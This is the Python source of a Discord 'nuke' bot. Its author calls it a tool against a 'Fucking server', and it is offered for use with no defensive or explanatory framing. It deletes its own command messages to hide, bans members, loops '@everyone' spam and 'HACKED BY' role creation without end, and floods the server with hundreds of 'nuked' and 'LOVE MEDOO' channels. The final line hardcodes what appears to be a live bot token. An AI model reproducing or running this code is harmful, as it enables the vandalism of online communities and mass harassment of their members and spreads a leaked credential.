# Made By Meeddooo // Valisa // f5r
# Fucking server
 
import discord
from discord.ext.commands import *
from discord.ext import commands
import random
import asyncio
import time
import json
from itertools import cycle
import time
from threading import Thread
from random import randint
import datetime
import os
import aiohttp
import sys
import traceback
import json
from discord.utils import get
 
 
##PREFIX##
 
bot = commands.Bot(command_prefix='!')
 
client = commands.Bot(command_prefix='!')
 
##OTHER##
bot.remove_command('help')
 
 
 
##BOT IS READY##
@bot.event
async def on_ready():
#BOT STATUS#
    print("Bot Is Online! Getting Ready To Spam.")
    print(f"Bot Status: Online!...")
 
 
 
##BAN COMMAND##
@bot.command(pass_context=True)
async def ban(ctx, member : discord.Member):
    await member.ban()
    await ctx.message.delete()
 
 
##SPAM COMMAND##
@bot.command(pass_context=True)
async def spam(ctx): #run "!spam" to run the command
    await ctx.message.delete()
    while True:
        await ctx.send("You Have Been Spammed!@everyone\nYou Have Been Spammed!@everyone\nYou Have Been Spammed!@everyone\nYou Have Been Spammed!@everyone\nYou Have Been Spammed!@everyone\nYou Have Been Spammed!@everyone\nYou Have Been Spammed!@everyone\nYou Have Been Spammed!@everyone\nYou Have Been Spammed!@everyone\n")
        await ctx.send("You Have Been Spammed!@everyone\nYou Have Been Spammed!@everyone\nYou Have Been Spammed!@everyone\nYou Have Been Spammed!@everyone\nYou Have Been Spammed!@everyone\nYou Have Been Spammed!@everyone\nYou Have Been Spammed!@everyone\nYou Have Been Spammed!@everyone\nYou Have Been Spammed!@everyone\n")
        await ctx.send("You Have Been Spammed!@everyone\nYou Have Been Spammed!@everyone\nYou Have Been Spammed!@everyone\nYou Have Been Spammed!@everyone\nYou Have Been Spammed!@everyone\nYou Have Been Spammed!@everyone\nYou Have Been Spammed!@everyone\nYou Have Been Spammed!@everyone\nYou Have Been Spammed!@everyone\n")
        await ctx.send("You Have Been Spammed!@everyone\nYou Have Been Spammed!@everyone\nYou Have Been Spammed!@everyone\nYou Have Been Spammed!@everyone\nYou Have Been Spammed!@everyone\nYou Have Been Spammed!@everyone\nYou Have Been Spammed!@everyone\nYou Have Been Spammed!@everyone\nYou Have Been Spammed!@everyone\n")
        await ctx.send("You Have Been Spammed!@everyone\nYou Have Been Spammed!@everyone\nYou Have Been Spammed!@everyone\nYou Have Been Spammed!@everyone\nYou Have Been Spammed!@everyone\nYou Have Been Spammed!@everyone\nYou Have Been Spammed!@everyone\nYou Have Been Spammed!@everyone\nYou Have Been Spammed!@everyone\n")
        await ctx.send("You Have Been Spammed!@everyone\nYou Have Been Spammed!@everyone\nYou Have Been Spammed!@everyone\nYou Have Been Spammed!@everyone\nYou Have Been Spammed!@everyone\nYou Have Been Spammed!@everyone\nYou Have Been Spammed!@everyone\nYou Have Been Spammed!@everyone\nYou Have Been Spammed!@everyone\n")
        await ctx.send("You Have Been Spammed!@everyone\nYou Have Been Spammed!@everyone\nYou Have Been Spammed!@everyone\nYou Have Been Spammed!@everyone\nYou Have Been Spammed!@everyone\nYou Have Been Spammed!@everyone\nYou Have Been Spammed!@everyone\nYou Have Been Spammed!@everyone\nYou Have Been Spammed!@everyone\n")
        await ctx.send("You Have Been Spammed!@everyone\nYou Have Been Spammed!@everyone\nYou Have Been Spammed!@everyone\nYou Have Been Spammed!@everyone\nYou Have Been Spammed!@everyone\nYou Have Been Spammed!@everyone\nYou Have Been Spammed!@everyone\nYou Have Been Spammed!@everyone\nYou Have Been Spammed!@everyone\n")
        await ctx.send("You Have Been Spammed!@everyone\nYou Have Been Spammed!@everyone\nYou Have Been Spammed!@everyone\nYou Have Been Spammed!@everyone\nYou Have Been Spammed!@everyone\nYou Have Been Spammed!@everyone\nYou Have Been Spammed!@everyone\nYou Have Been Spammed!@everyone\nYou Have Been Spammed!@everyone\n")
        await ctx.send("You Have Been Spammed!@everyone\nYou Have Been Spammed!@everyone\nYou Have Been Spammed!@everyone\nYou Have Been Spammed!@everyone\nYou Have Been Spammed!@everyone\nYou Have Been Spammed!@everyone\nYou Have Been Spammed!@everyone\nYou Have Been Spammed!@everyone\nYou Have Been Spammed!@everyone\n")
        await ctx.send("You Have Been Spammed!@everyone\nYou Have Been Spammed!@everyone\nYou Have Been Spammed!@everyone\nYou Have Been Spammed!@everyone\nYou Have Been Spammed!@everyone\nYou Have Been Spammed!@everyone\nYou Have Been Spammed!@everyone\nYou Have Been Spammed!@everyone\nYou Have Been Spammed!@everyone\n")
        await ctx.send("You Have Been Spammed!@everyone\nYou Have Been Spammed!@everyone\nYou Have Been Spammed!@everyone\nYou Have Been Spammed!@everyone\nYou Have Been Spammed!@everyone\nYou Have Been Spammed!@everyone\nYou Have Been Spammed!@everyone\nYou Have Been Spammed!@everyone\nYou Have Been Spammed!@everyone\n")
        await ctx.send("You Have Been Spammed!@everyone\nYou Have Been Spammed!@everyone\nYou Have Been Spammed!@everyone\nYou Have Been Spammed!@everyone\nYou Have Been Spammed!@everyone\nYou Have Been Spammed!@everyone\nYou Have Been Spammed!@everyone\nYou Have Been Spammed!@everyone\nYou Have Been Spammed!@everyone\n")
        await ctx.send("You Have Been Spammed!@everyone\nYou Have Been Spammed!@everyone\nYou Have Been Spammed!@everyone\nYou Have Been Spammed!@everyone\nYou Have Been Spammed!@everyone\nYou Have Been Spammed!@everyone\nYou Have Been Spammed!@everyone\nYou Have Been Spammed!@everyone\nYou Have Been Spammed!@everyone\n")
        await ctx.send("You Have Been Spammed!@everyone\nYou Have Been Spammed!@everyone\nYou Have Been Spammed!@everyone\nYou Have Been Spammed!@everyone\nYou Have Been Spammed!@everyone\nYou Have Been Spammed!@everyone\nYou Have Been Spammed!@everyone\nYou Have Been Spammed!@everyone\nYou Have Been Spammed!@everyone\n")
        await ctx.send("You Have Been Spammed!@everyone\nYou Have Been Spammed!@everyone\nYou Have Been Spammed!@everyone\nYou Have Been Spammed!@everyone\nYou Have Been Spammed!@everyone\nYou Have Been Spammed!@everyone\nYou Have Been Spammed!@everyone\nYou Have Been Spammed!@everyone\nYou Have Been Spammed!@everyone\n")
        await ctx.send("You Have Been Spammed!@everyone\nYou Have Been Spammed!@everyone\nYou Have Been Spammed!@everyone\nYou Have Been Spammed!@everyone\nYou Have Been Spammed!@everyone\nYou Have Been Spammed!@everyone\nYou Have Been Spammed!@everyone\nYou Have Been Spammed!@everyone\nYou Have Been Spammed!@everyone\n")
        await ctx.send("You Have Been Spammed!@everyone\nYou Have Been Spammed!@everyone\nYou Have Been Spammed!@everyone\nYou Have Been Spammed!@everyone\nYou Have Been Spammed!@everyone\nYou Have Been Spammed!@everyone\nYou Have Been Spammed!@everyone\nYou Have Been Spammed!@everyone\nYou Have Been Spammed!@everyone\n")
        await ctx.send("You Have Been Spammed!@everyone\nYou Have Been Spammed!@everyone\nYou Have Been Spammed!@everyone\nYou Have Been Spammed!@everyone\nYou Have Been Spammed!@everyone\nYou Have Been Spammed!@everyone\nYou Have Been Spammed!@everyone\nYou Have Been Spammed!@everyone\nYou Have Been Spammed!@everyone\n")
        await ctx.send("You Have Been Spammed!@everyone\nYou Have Been Spammed!@everyone\nYou Have Been Spammed!@everyone\nYou Have Been Spammed!@everyone\nYou Have Been Spammed!@everyone\nYou Have Been Spammed!@everyone\nYou Have Been Spammed!@everyone\nYou Have Been Spammed!@everyone\nYou Have Been Spammed!@everyone\n")
        await ctx.send("You Have Been Spammed!@everyone\nYou Have Been Spammed!@everyone\nYou Have Been Spammed!@everyone\nYou Have Been Spammed!@everyone\nYou Have Been Spammed!@everyone\nYou Have Been Spammed!@everyone\nYou Have Been Spammed!@everyone\nYou Have Been Spammed!@everyone\nYou Have Been Spammed!@everyone\n")
        await ctx.send("You Have Been Spammed!@everyone\nYou Have Been Spammed!@everyone\nYou Have Been Spammed!@everyone\nYou Have Been Spammed!@everyone\nYou Have Been Spammed!@everyone\nYou Have Been Spammed!@everyone\nYou Have Been Spammed!@everyone\nYou Have Been Spammed!@everyone\nYou Have Been Spammed!@everyone\n")
        await ctx.send("You Have Been Spammed!@everyone\nYou Have Been Spammed!@everyone\nYou Have Been Spammed!@everyone\nYou Have Been Spammed!@everyone\nYou Have Been Spammed!@everyone\nYou Have Been Spammed!@everyone\nYou Have Been Spammed!@everyone\nYou Have Been Spammed!@everyone\nYou Have Been Spammed!@everyone\n")
        await ctx.send("You Have Been Spammed!@everyone\nYou Have Been Spammed!@everyone\nYou Have Been Spammed!@everyone\nYou Have Been Spammed!@everyone\nYou Have Been Spammed!@everyone\nYou Have Been Spammed!@everyone\nYou Have Been Spammed!@everyone\nYou Have Been Spammed!@everyone\nYou Have Been Spammed!@everyone\n")
        await ctx.send("You Have Been Spammed!@everyone\nYou Have Been Spammed!@everyone\nYou Have Been Spammed!@everyone\nYou Have Been Spammed!@everyone\nYou Have Been Spammed!@everyone\nYou Have Been Spammed!@everyone\nYou Have Been Spammed!@everyone\nYou Have Been Spammed!@everyone\nYou Have Been Spammed!@everyone\n")
        await ctx.send("You Have Been Spammed!@everyone\nYou Have Been Spammed!@everyone\nYou Have Been Spammed!@everyone\nYou Have Been Spammed!@everyone\nYou Have Been Spammed!@everyone\nYou Have Been Spammed!@everyone\nYou Have Been Spammed!@everyone\nYou Have Been Spammed!@everyone\nYou Have Been Spammed!@everyone\n")
        await ctx.send("You Have Been Spammed!@everyone\nYou Have Been Spammed!@everyone\nYou Have Been Spammed!@everyone\nYou Have Been Spammed!@everyone\nYou Have Been Spammed!@everyone\nYou Have Been Spammed!@everyone\nYou Have Been Spammed!@everyone\nYou Have Been Spammed!@everyone\nYou Have Been Spammed!@everyone\n")
        await ctx.send("You Have Been Spammed!@everyone\nYou Have Been Spammed!@everyone\nYou Have Been Spammed!@everyone\nYou Have Been Spammed!@everyone\nYou Have Been Spammed!@everyone\nYou Have Been Spammed!@everyone\nYou Have Been Spammed!@everyone\nYou Have Been Spammed!@everyone\nYou Have Been Spammed!@everyone\n")
        await ctx.send("You Have Been Spammed!@everyone\nYou Have Been Spammed!@everyone\nYou Have Been Spammed!@everyone\nYou Have Been Spammed!@everyone\nYou Have Been Spammed!@everyone\nYou Have Been Spammed!@everyone\nYou Have Been Spammed!@everyone\nYou Have Been Spammed!@everyone\nYou Have Been Spammed!@everyone\n")
        await ctx.send("You Have Been Spammed!@everyone\nYou Have Been Spammed!@everyone\nYou Have Been Spammed!@everyone\nYou Have Been Spammed!@everyone\nYou Have Been Spammed!@everyone\nYou Have Been Spammed!@everyone\nYou Have Been Spammed!@everyone\nYou Have Been Spammed!@everyone\nYou Have Been Spammed!@everyone\n")
        await ctx.send("You Have Been Spammed!@everyone\nYou Have Been Spammed!@everyone\nYou Have Been Spammed!@everyone\nYou Have Been Spammed!@everyone\nYou Have Been Spammed!@everyone\nYou Have Been Spammed!@everyone\nYou Have Been Spammed!@everyone\nYou Have Been Spammed!@everyone\nYou Have Been Spammed!@everyone\n")
 
 
 
       
##SPAM ROLE##
@bot.command(pass_context=True)
async def roles(ctx):
    await ctx.message.delete()
    while True:
        guild = ctx.guild
        await guild.create_role(name="HACKED BY Meeeddooo")
 
 
 
##MAKE CHANNELS##
@bot.command(pass_context=True)
async def channels(ctx):
    await ctx.message.delete()
    guild = ctx.message.guild
    await guild.create_text_channel('LOVE MEDOO') #you can change the channel name by replacing 'nuked' to any name
    await guild.create_text_channel('LOVE MEDOO')
    await guild.create_text_channel('LOVE MEDOO')
    await guild.create_text_channel('nuked')
    await guild.create_text_channel('nuked')
    await guild.create_text_channel('nuked')
    await guild.create_text_channel('nuked')
    await guild.create_text_channel('nuked')
    await guild.create_text_channel('nuked')
    await guild.create_text_channel('nuked')
    await guild.create_text_channel('nuked')
    await guild.create_text_channel('nuked')
    await guild.create_text_channel('nuked')
    await guild.create_text_channel('nuked')
    await guild.create_text_channel('nuked')
    await guild.create_text_channel('nuked')
    await guild.create_text_channel('nuked')
    await guild.create_text_channel('nuked')
    await guild.create_text_channel('nuked')
    await guild.create_text_channel('nuked')
    await guild.create_text_channel('nuked')
    await guild.create_text_channel('nuked')
    await guild.create_text_channel('nuked')
    await guild.create_text_channel('nuked')
    await guild.create_text_channel('nuked')
    await guild.create_text_channel('nuked')
    await guild.create_text_channel('nuked')
    await guild.create_text_channel('nuked')
    await guild.create_text_channel('nuked')
    await guild.create_text_channel('nuked')
    await guild.create_text_channel('nuked')
    await guild.create_text_channel('nuked')
    await guild.create_text_channel('nuked')
    await guild.create_text_channel('nuked')
    await guild.create_text_channel('nuked')
    await guild.create_text_channel('nuked')
    await guild.create_text_channel('nuked')
    await guild.create_text_channel('nuked')
    await guild.create_text_channel('nuked')
    await guild.create_text_channel('nuked')
    await guild.create_text_channel('nuked')
    await guild.create_text_channel('nuked')
    await guild.create_text_channel('nuked')
    await guild.create_text_channel('nuked')
    await guild.create_text_channel('nuked')
    await guild.create_text_channel('nuked')
    await guild.create_text_channel('nuked')
    await guild.create_text_channel('nuked')
    await guild.create_text_channel('nuked')
    await guild.create_text_channel('nuked')
    await guild.create_text_channel('nuked')
    await guild.create_text_channel('nuked')
    await guild.create_text_channel('nuked')
    await guild.create_text_channel('nuked')
    await guild.create_text_channel('nuked')
    await guild.create_text_channel('nuked')
    await guild.create_text_channel('nuked')
    await guild.create_text_channel('nuked')
    await guild.create_text_channel('nuked')
    await guild.create_text_channel('nuked')
    await guild.create_text_channel('nuked')
    await guild.create_text_channel('nuked')
    await guild.create_text_channel('nuked')
    await guild.create_text_channel('nuked')
    await guild.create_text_channel('nuked')
    await guild.create_text_channel('nuked')
    await guild.create_text_channel('nuked')
    await guild.create_text_channel('nuked')
    await guild.create_text_channel('nuked')
    await guild.create_text_channel('nuked')
    await guild.create_text_channel('nuked')
    await guild.create_text_channel('nuked')
    await guild.create_text_channel('nuked')
    await guild.create_text_channel('nuked')
    await guild.create_text_channel('nuked')
    await guild.create_text_channel('nuked')
    await guild.create_text_channel('nuked')
    await guild.create_text_channel('nuked')
    await guild.create_text_channel('nuked')
    await guild.create_text_channel('nuked')
    await guild.create_text_channel('nuked')
    await guild.create_text_channel('nuked')
    await guild.create_text_channel('nuked')
    await guild.create_text_channel('nuked')
    await guild.create_text_channel('nuked')
    await guild.create_text_channel('nuked')
    await guild.create_text_channel('nuked')
    await guild.create_text_channel('nuked')
    await guild.create_text_channel('nuked')
    await guild.create_text_channel('nuked')
    await guild.create_text_channel('nuked')
    await guild.create_text_channel('nuked')
    await guild.create_text_channel('nuked')
    await guild.create_text_channel('nuked')
    await guild.create_text_channel('nuked')
    await guild.create_text_channel('nuked')
    await guild.create_text_channel('nuked')
    await guild.create_text_channel('nuked')
    await guild.create_text_channel('nuked')
    await guild.create_text_channel('nuked')
    await guild.create_text_channel('nuked')
    await guild.create_text_channel('nuked')
    await guild.create_text_channel('nuked')
    await guild.create_text_channel('nuked')
    await guild.create_text_channel('nuked')
    await guild.create_text_channel('nuked')
    await guild.create_text_channel('nuked')
    await guild.create_text_channel('nuked')
    await guild.create_text_channel('nuked')
    await guild.create_text_channel('nuked')
    await guild.create_text_channel('nuked')
    await guild.create_text_channel('nuked')
    await guild.create_text_channel('nuked')
    await guild.create_text_channel('nuked')
    await guild.create_text_channel('nuked')
    await guild.create_text_channel('nuked')
    await guild.create_text_channel('nuked')
    await guild.create_text_channel('nuked')
    await guild.create_text_channel('nuked')
    await guild.create_text_channel('nuked')
    await guild.create_text_channel('nuked')
    await guild.create_text_channel('nuked')
    await guild.create_text_channel('nuked')
    await guild.create_text_channel('nuked')
    await guild.create_text_channel('nuked')
    await guild.create_text_channel('nuked')
    await guild.create_text_channel('nuked')
    await guild.create_text_channel('nuked')
    await guild.create_text_channel('nuked')
    await guild.create_text_channel('nuked')
    await guild.create_text_channel('nuked')
    await guild.create_text_channel('nuked')
    await guild.create_text_channel('nuked')
    await guild.create_text_channel('nuked')
    await guild.create_text_channel('nuked')
    await guild.create_text_channel('nuked')
    await guild.create_text_channel('nuked')
    await guild.create_text_channel('nuked')
    await guild.create_text_channel('nuked')
    await guild.create_text_channel('nuked')
    await guild.create_text_channel('nuked')
    await guild.create_text_channel('nuked')
    await guild.create_text_channel('nuked')
    await guild.create_text_channel('nuked')
    await guild.create_text_channel('nuked')
    await guild.create_text_channel('nuked')
    await guild.create_text_channel('nuked')
    await guild.create_text_channel('nuked')
    await guild.create_text_channel('nuked')
    await guild.create_text_channel('nuked')
    await guild.create_text_channel('nuked')
    await guild.create_text_channel('nuked')
    await guild.create_text_channel('nuked')
    await guild.create_text_channel('nuked')
    await guild.create_text_channel('nuked')
    await guild.create_text_channel('nuked')
    await guild.create_text_channel('nuked')
    await guild.create_text_channel('nuked')
    await guild.create_text_channel('nuked')
    await guild.create_text_channel('nuked')
    await guild.create_text_channel('nuked')
    await guild.create_text_channel('nuked')
    await guild.create_text_channel('nuked')
    await guild.create_text_channel('nuked')
    await guild.create_text_channel('nuked')
    await guild.create_text_channel('nuked')
    await guild.create_text_channel('nuked')
    await guild.create_text_channel('nuked')
    await guild.create_text_channel('nuked')
    await guild.create_text_channel('nuked')
    await guild.create_text_channel('nuked')
    await guild.create_text_channel('nuked')
    await guild.create_text_channel('nuked')
    await guild.create_text_channel('nuked')
    await guild.create_text_channel('nuked')
    await guild.create_text_channel('nuked')
    await guild.create_text_channel('nuked')
    await guild.create_text_channel('nuked')
    await guild.create_text_channel('nuked')
    await guild.create_text_channel('nuked')
    await guild.create_text_channel('nuked')
    await guild.create_text_channel('nuked')
    await guild.create_text_channel('nuked')
    await guild.create_text_channel('nuked')
    await guild.create_text_channel('nuked')
    await guild.create_text_channel('nuked')
    await guild.create_text_channel('nuked')
    await guild.create_text_channel('nuked')
    await guild.create_text_channel('nuked')
    await guild.create_text_channel('nuked')
    await guild.create_text_channel('nuked')
    await guild.create_text_channel('nuked')
    await guild.create_text_channel('nuked')
    await guild.create_text_channel('nuked')
    await guild.create_text_channel('nuked')
    await guild.create_text_channel('nuked')
    await guild.create_text_channel('nuked')
    await guild.create_text_channel('nuked')
    await guild.create_text_channel('nuked')
    await guild.create_text_channel('nuked')
    await guild.create_text_channel('nuked')
    await guild.create_text_channel('nuked')
    await guild.create_text_channel('nuked')
    await guild.create_text_channel('nuked')
    await guild.create_text_channel('nuked')
    await guild.create_text_channel('nuked')
    await guild.create_text_channel('nuked')
    await guild.create_text_channel('nuked')
    await guild.create_text_channel('nuked')
    await guild.create_text_channel('nuked')
    await guild.create_text_channel('nuked')
    await guild.create_text_channel('nuked')
    await guild.create_text_channel('nuked')
    await guild.create_text_channel('nuked')
    await guild.create_text_channel('nuked')
    await guild.create_text_channel('nuked')
    await guild.create_text_channel('nuked')
    await guild.create_text_channel('nuked')
    await guild.create_text_channel('nuked')
    await guild.create_text_channel('nuked')
    await guild.create_text_channel('nuked')
    await guild.create_text_channel('nuked')
    await guild.create_text_channel('nuked')
    await guild.create_text_channel('nuked')
    await guild.create_text_channel('nuked')
    await guild.create_text_channel('nuked')
    await guild.create_text_channel('nuked')
    await guild.create_text_channel('nuked')
    await guild.create_text_channel('nuked')
    await guild.create_text_channel('nuked')
    await guild.create_text_channel('nuked')
    await guild.create_text_channel('nuked')
    await guild.create_text_channel('nuked')
    await guild.create_text_channel('nuked')
    await guild.create_text_channel('nuked')
    await guild.create_text_channel('nuked')
    await guild.create_text_channel('nuked')
    await guild.create_text_channel('nuked')
    await guild.create_text_channel('nuked')
    await guild.create_text_channel('nuked')
    await guild.create_text_channel('nuked')
    await guild.create_text_channel('nuked')
    await guild.create_text_channel('nuked')
    await guild.create_text_channel('nuked')
    await guild.create_text_channel('nuked')
    await guild.create_text_channel('nuked')
    await guild.create_text_channel('nuked')
    await guild.create_text_channel('nuked')
    await guild.create_text_channel('nuked')
    await guild.create_text_channel('nuked')
    await guild.create_text_channel('nuked')
    await guild.create_text_channel('nuked')
    await guild.create_text_channel('nuked')
    await guild.create_text_channel('nuked')
    await guild.create_text_channel('nuked')
    await guild.create_text_channel('nuked')
    await guild.create_text_channel('nuked')
    await guild.create_text_channel('nuked')
    await guild.create_text_channel('nuked')
    await guild.create_text_channel('nuked')
    await guild.create_text_channel('nuked')
    await guild.create_text_channel('nuked')
    await guild.create_text_channel('nuked')
    await guild.create_text_channel('nuked')
    await guild.create_text_channel('nuked')
    await guild.create_text_channel('nuked')
    await guild.create_text_channel('nuked')
    await guild.create_text_channel('nuked')
    await guild.create_text_channel('nuked')
    await guild.create_text_channel('nuked')
    await guild.create_text_channel('nuked')
    await guild.create_text_channel('nuked')
    await guild.create_text_channel('nuked')
    await guild.create_text_channel('nuked')
    await guild.create_text_channel('nuked')
    await guild.create_text_channel('nuked')
    await guild.create_text_channel('nuked')
    await guild.create_text_channel('nuked')
    await guild.create_text_channel('nuked')
    await guild.create_text_channel('nuked')
    await guild.create_text_channel('nuked')
    await guild.create_text_channel('nuked')
    await guild.create_text_channel('nuked')
    await guild.create_text_channel('nuked')
    await guild.create_text_channel('nuked')
    await guild.create_text_channel('nuked')
    await guild.create_text_channel('nuked')
    await guild.create_text_channel('nuked')
    await guild.create_text_channel('nuked')
    await guild.create_text_channel('nuked')
    await guild.create_text_channel('nuked')
    await guild.create_text_channel('nuked')
    await guild.create_text_channel('nuked')
    await guild.create_text_channel('nuked')
    await guild.create_text_channel('nuked')
    await guild.create_text_channel('nuked')
    await guild.create_text_channel('nuked')
    await guild.create_text_channel('nuked')
    await guild.create_text_channel('nuked')
    await guild.create_text_channel('nuked')
    await guild.create_text_channel('nuked')
    await guild.create_text_channel('nuked')
    await guild.create_text_channel('nuked')
    await guild.create_text_channel('nuked')
    await guild.create_text_channel('nuked')
    await guild.create_text_channel('nuked')
    await guild.create_text_channel('nuked')
    await guild.create_text_channel('nuked')
    await guild.create_text_channel('nuked')
    await guild.create_text_channel('nuked')
    await guild.create_text_channel('nuked')
    await guild.create_text_channel('nuked')
    await guild.create_text_channel('nuked')
    await guild.create_text_channel('nuked')
    await guild.create_text_channel('nuked')
    await guild.create_text_channel('nuked')
    await guild.create_text_channel('nuked')
    await guild.create_text_channel('nuked')
    await guild.create_text_channel('nuked')
    await guild.create_text_channel('nuked')
    await guild.create_text_channel('nuked')
    await guild.create_text_channel('nuked')
    await guild.create_text_channel('nuked')
    await guild.create_text_channel('nuked')
    await guild.create_text_channel('nuked')
    await guild.create_text_channel('nuked')
    await guild.create_text_channel('nuked')
    await guild.create_text_channel('nuked')
    await guild.create_text_channel('nuked')
    await guild.create_text_channel('nuked')
    await guild.create_text_channel('nuked')
    await guild.create_text_channel('nuked')
    await guild.create_text_channel('nuked')
    await guild.create_text_channel('nuked')
    await guild.create_text_channel('nuked')
    await guild.create_text_channel('nuked')
    await guild.create_text_channel('nuked')
    await guild.create_text_channel('nuked')
    await guild.create_text_channel('nuked')
    await guild.create_text_channel('nuked')
    await guild.create_text_channel('nuked')
    await guild.create_text_channel('nuked')
    await guild.create_text_channel('nuked')
    await guild.create_text_channel('nuked')
    await guild.create_text_channel('nuked')
    await guild.create_text_channel('nuked')
    await guild.create_text_channel('nuked')
    await guild.create_text_channel('nuked')
    await guild.create_text_channel('nuked')
    await guild.create_text_channel('nuked')
    await guild.create_text_channel('nuked')
    await guild.create_text_channel('nuked')
    await guild.create_text_channel('nuked')
    await guild.create_text_channel('LOVE MEDOO')
    await guild.create_text_channel('LOVE MEDOO')
    await guild.create_text_channel('LOVE MEDOO')
    await guild.create_text_channel('LOVE MEDOO')
    await guild.create_text_channel('LOVE MEDOO')
    await guild.create_text_channel('LOVE MEDOO')
    await guild.create_text_channel('LOVE MEDOO')
    await guild.create_text_channel('LOVE MEDOO')
    await guild.create_text_channel('LOVE MEDOO')
    await guild.create_text_channel('LOVE MEDOO')
    await guild.create_text_channel('LOVE MEDOO')
    await guild.create_text_channel('LOVE MEDOO')
    await guild.create_text_channel('LOVE MEDOO')
    await guild.create_text_channel('LOVE MEDOO')
    await guild.create_text_channel('LOVE MEDOO')
    await guild.create_text_channel('LOVE MEDOO')
    await guild.create_text_channel('LOVE MEDOO')
    await guild.create_text_channel('LOVE MEDOO')
    await guild.create_text_channel('LOVE MEDOO')
 
 
 
 
##BOT TOKEN##
bot.run ("NTg1NTQ4OTMxNjM5OTM0OTkx.XVDgvw.h_zdNMaQzKAPb7hfvnQwAntkHs8")